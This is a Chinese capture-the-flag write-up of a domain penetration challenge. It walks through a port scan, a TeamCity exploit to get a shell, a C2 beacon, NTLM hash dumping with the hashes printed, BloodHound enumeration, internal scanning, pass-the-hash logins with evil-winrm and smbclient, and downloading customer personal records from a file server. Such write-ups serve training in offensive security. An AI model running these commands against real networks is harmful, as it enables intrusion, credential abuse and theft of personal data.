第二届红桥杯域渗透挑战赛WP

发表于 更新于 阅读次数: 本文字数: 500 阅读时长 ≈ 2 分钟

入口

端口扫描,扫到以下端口开放

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
👉 root@racknerd-cfd9bbe ~ git:() docker run -it --rm --name rustscan rustscan/rustscan:2.1.1 -u 70000 -a 50.185.68.69 -- -sC -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 70000.
Open 50.185.68.69:80
Open 50.185.68.69:3306
Open 50.185.68.69:5672
Open 50.185.68.69:8111
Open 50.185.68.69:8080
Open 50.185.68.69:8081
Open 50.185.68.69:8383

分别访问并找历史CVE漏洞,最后发现 8111 端口的 TeamCity 可以利用,使用找到的 RCE exp GetShell

202410281705508

然后上传 C2 beacon 并上线该机器(反弹shell也是可以的,只不过用C2后续操作更加方便)

内网

用CS上线之后,使用 hashdump 命令 dump 本机的用户hash,拿到以下hash

202410281707695

1
2
3
4
5
6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::
apache:1001:aad3b435b51404eeaad3b435b51404ee:ed813bb7cbb634bdd4b33e0c71d45cea:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
mspadmin:1000:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:42bd78d638a1093d29abbfebda57f139:::

然后上传 SharpHound.exe 进行域信息收集,收集完毕之后在 BloodHound 中查看,发现 mspadmin 用户隶属于域 Administrator 组和 Domain Admins 组(任务:获取DA域管理员权限 - 完成)

202410281711413

这也就说明我们现在已经拥有了域内管理员权限了。然后上传并使用 fscan.exe 扫描内网资产,目的是定位域控和 FILES001 机器,所以这里使用 -nopoc 参数并指定常见端口进行扫描,命令如下:

1
fscan.exe -h 10.2.40.1/16 -nopoc -t 10 -p 88,135,389,445,636,5985

扫描结果如下图:

202410281714679

开放端口如下:

202410281717357

然后内网穿透并使用 evil-winrmpth 的方式登上去,成功登录,域管理员账户有效。

1
proxychains4 -q evil-winrm -i 10.2.40.50 -u mspadmin -H e20e81c5c06ccf288474c581f13423b9

202410281718396

202410281719090

文件服务器

现在只剩在 FILES001 中寻找敏感信息了。用 smbclienttree 命令可以快速浏览大量文件。最终在E盘中找到大量客户记录(custom records)。

1
2
3
4
5
6
7
8
9
10
11
12
proxychains4 smbclient.py gapfactories.local/mspadmin@10.2.40.90 --hashes ":e20e81c5c06ccf288474c581f13423b9"

# shares
ADMIN$
C$
E$
Insurances
IPC$
it

# use E$
# tree

202410281723769

202410281723014

下载下来进行查看,发现确实是客户的个人信息。(任务:窃取FILE001文件服务器上的用户数据 - 完成)

202410281725843